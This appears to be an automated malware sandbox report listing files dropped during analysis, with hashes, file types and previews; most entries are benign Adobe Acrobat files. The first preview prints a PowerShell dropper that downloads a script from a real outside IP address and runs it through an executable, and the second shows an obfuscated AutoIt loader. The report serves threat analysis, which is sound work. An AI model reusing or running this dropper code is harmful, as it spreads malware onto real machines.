                                                                                                        SHA-512:2E23659CCA40AA15ABEF829D0B4D4639F5E13083BC54469D5D96A9AD119CE4670546689BC5A7341DAA2354E12ABDB3B8A4C9409C485B8D6BF999BB3996F92425
                                                                                                        Malicious:true
                                                                                                        Preview:[string]$fU5L = "http://139.99.188.124/VmnWBYrzn.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1241207
                                                                                                        Entropy (8bit):5.143684992797654
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:28V+jcfSicb4/G10K5F3/nzEGPIWX30KrCIc4S36d6tWRYd1d:qctG4umKX379xdrggeIYZ
                                                                                                        MD5:4756DBA4ADAEBCB1F0D68AC60B0288E6
                                                                                                        SHA1:73A4B0BD37509CB322BD9D02073C51D899A6D79E
                                                                                                        SHA-256:30F2C103373F48F5DA93AEF89132D37C5206BF21A5F5746090A37C383F7AA544
                                                                                                        SHA-512:593AF4257A98C0C45EB3A18D26FE7EF88E41B4D8CA0C4DE5FBE1AA7A54A46DAC189FB99618A9C458ECCB30217EBD9B0A0EC4E33562075415025BC4B168EA86CD
                                                                                                        Malicious:true
                                                                                                        Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):475
                                                                                                        Entropy (8bit):4.971824627296864
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:modified
                                                                                                        Size (bytes):475
                                                                                                        Entropy (8bit):4.971824627296864
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65110
                                                                                                        Entropy (8bit):4.0960479354974
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:u0eDil7wkRKfCqzmbeE/kh1B1Qn/0CjVQe0yZHvxUli:GA7wyCNSiE/kh1Bc/0Cj4yZJ7
                                                                                                        MD5:AD103A90F30942B861F8499BF5C68CB9
                                                                                                        SHA1:4C70481637E46F4E61CDBF46E8ACB05FB31AB263
                                                                                                        SHA-256:F4DE33405E2771BA2C8FD2E0378453815CE0F3732CC624C5D163060616172389
                                                                                                        SHA-512:0E14321DB45729D7D11D6DB505C75F50B71CE6036A91C3E18DD988CD1A43CA90DDC592F739C1170F1BA4521AE2702A1144912B77E805B9220F77EB196C05326B
                                                                                                        Malicious:false
                                                                                                        Preview:BMV.......6...(...k...h..... .............................................................................................................................................................................................................................................................................................................................................................qrs.ghi.................jkl.........us..LI..OM......po..LJ.._]..........*)-.0/3.}}..........98<.=<@.........................................................................................................................................................................................................................................................................................................................................dfg.`ab.`ab.~.......`ab.`ab._`a.....C@..CA..CA..pn..ca..CA..CA..MK........"..."...!.....326..."...".558...........................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                                        Category:dropped
                                                                                                        Size (bytes):86016
                                                                                                        Entropy (8bit):4.444927157948472
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ye6ci5t1iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mes3OazzU89UTTgUL
                                                                                                        MD5:84D9DF4BDDE9FC08DF0B616D2D399E03
                                                                                                        SHA1:6ED4DD5557FCC9B5BFAC0613E79628DBED303607
                                                                                                        SHA-256:D276C2C178C42078FC61A19B41F139A2A19A6CDA3DB80669745CED33512F0E90
                                                                                                        SHA-512:18E167252733D9C437523645F8E420F7E5E4B5CF3693EBB80CCC5FE48F35A2CA8203798C591EBA5F86358E1A6C4F434F1A7C4ABD5815B458D4CA9E1321371AE5
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):3.768968894406968
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:7M+JioyVZioyhoy1C7oy16oy1TKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1O3:7FJuZ3KXjBigb9IVXEBodRBk5
                                                                                                        MD5:1183265ECFD3772ABA063ED548048EE5
                                                                                                        SHA1:F651C969D303BCE6742C80A5222ABEFBF32B6812
                                                                                                        SHA-256:0EAAAA97966925F70FF3431F5917528B946B77BBB484A13FBC0192D4ED87FCB8
                                                                                                        SHA-512:5CD364A150197902FC5B51FD19CE6629FED3A12E147C296780FC239E79E2CFEDD995C0790062363833CA7AA7156F761A50F3C6F64C2A14D30018417D13AFBCEC
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c......@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Certificate, Version=3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1391
                                                                                                        Entropy (8bit):7.705940075877404
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                        Malicious:false
                                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):2.756901573172974
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:kkFkl3fUuIlXfllXlE/HT8kn1lltNNX8RolJuRdxLlGB9lQRYwpDdt:kKBuZT8ulNMa8RdWBwRd
                                                                                                        MD5:B9C1DC3066FDBFF72DC3B0C88FBE693A
                                                                                                        SHA1:9FF5696FBD64BCACC573F594634D1F666FB3E8EE
                                                                                                        SHA-256:987CA0F52686F4C30DE7EE2BB215649C6B98C062203D1872EF2F95F9BB7205FB
                                                                                                        SHA-512:3B1F70067BE9D1A512B4C922B3F1BD4F5A9DF804ABF9E80B3B4284E3EC7F418ECBAD5EB0B780807AE332E8698AB66F9FB02E7A2FA02559A0C5774ABA5DB4208F
                                                                                                        Malicious:false
                                                                                                        Preview:p...... .........z1..U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10880
                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10880
                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.344948696833951
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJM3g98kUwPeUkwRe9:YvXKX+HSQW0c0nGMbLUkee9
                                                                                                        MD5:068756D4AFF5808C712C82CC17873B75
                                                                                                        SHA1:F0C27DAF7F32317C8B7A61A142776D95C847E054
                                                                                                        SHA-256:0618388D880C6E3C07DF53DA45DF289D82D6FA98D01550B6A85B3BB18CA9A67C
                                                                                                        SHA-512:DA04AB0AD48E8110127BB362768F67BD9EC4DFC7BC6C0B67B679E1CBBEC27C8C7FE332B7C022D0E3886DB161C43C663650BD77AFAE5A452539CA6383E3F23CDF
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.30011764429531
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfBoTfXpnrPeUkwRe9:YvXKX+HSQW0c0nGWTfXcUkee9
                                                                                                        MD5:7CE23F3A2F4B08E167A134A382246968
                                                                                                        SHA1:98FE9936CADB2CB051BA8159AA01C7F8742AEA31
                                                                                                        SHA-256:CDB317C991927E3F39ADEF3C6B0C4366F93A1DBA93804D7296BA935DB8A17DF6
                                                                                                        SHA-512:C601DC6A1C89C8E0C70581F33AD0F502A7387DC6217E0B3CB55200ED605FBED4816702E8B86874E09EABB9070ADAFA85731866524CF821F818394FFC8DB60F6B
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.278377139653117
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfBD2G6UpnrPeUkwRe9:YvXKX+HSQW0c0nGR22cUkee9
                                                                                                        MD5:7B33AB931359386C107DA06DFDD7FB50
                                                                                                        SHA1:D05488A0C0FAC7E49260FC70612FC5637DCBE7A8
                                                                                                        SHA-256:D1FE64CD931FE090D1A9AC7218DD38C8CF208858089DA132C92CB67EA59A9E8B
                                                                                                        SHA-512:85201875FEF923A1D479F0BC435C5A7C96E1DB84B09D679A54419175F35657C1C506A1F73A1052844E771C9090ED6AD13E04187E5560DEA4296DB1ECBB8F89C3
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):285
                                                                                                        Entropy (8bit):5.324325143042335
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfPmwrPeUkwRe9:YvXKX+HSQW0c0nGH56Ukee9
                                                                                                        MD5:E68711E40B3474A3D2CA91E2ADD5E2BB
                                                                                                        SHA1:C154536811B4D812124307CDE4A57D9FAA802FEA
                                                                                                        SHA-256:D2FFF16834255333B2B0A6FAE4E62DC86CAA88605044DE07603BBFCB283759FC
                                                                                                        SHA-512:EE470B582D6338D8CAA8BCD66399357E73CB28622D5DDA3920052208CE14D57F5B39E58DE5CEEC43853F51B4F8C14D5153C87A4E103AC804B1066350E8EFEFA7
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1123
                                                                                                        Entropy (8bit):5.68868098188253
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6X+HSQWZNpLgE9cQx8LennAvzBvkn0RCmK8czOCCSc+Sn:Yvo/hgy6SAFv5Ah8cv/c+Sn
                                                                                                        MD5:3EF6A0B81CB417744FAB9B5B2CCDB06D
                                                                                                        SHA1:12A6C3072E5F31F4D49E336E49F18F1B5C1D64C3
                                                                                                        SHA-256:EB34D748C58F347C2F0CD883F13E4F679A00C03A2804520586B2E5799E52A611
                                                                                                        SHA-512:28496A9B94488D3FE932690700E0FAF2DB0070302D22A043C7349E0CDD6BFED1CF52AA3531013201438D90920AD0A0271B6907E9950D0EDBF816EFBFB43BB19B
                                                                                                        Malicious:false
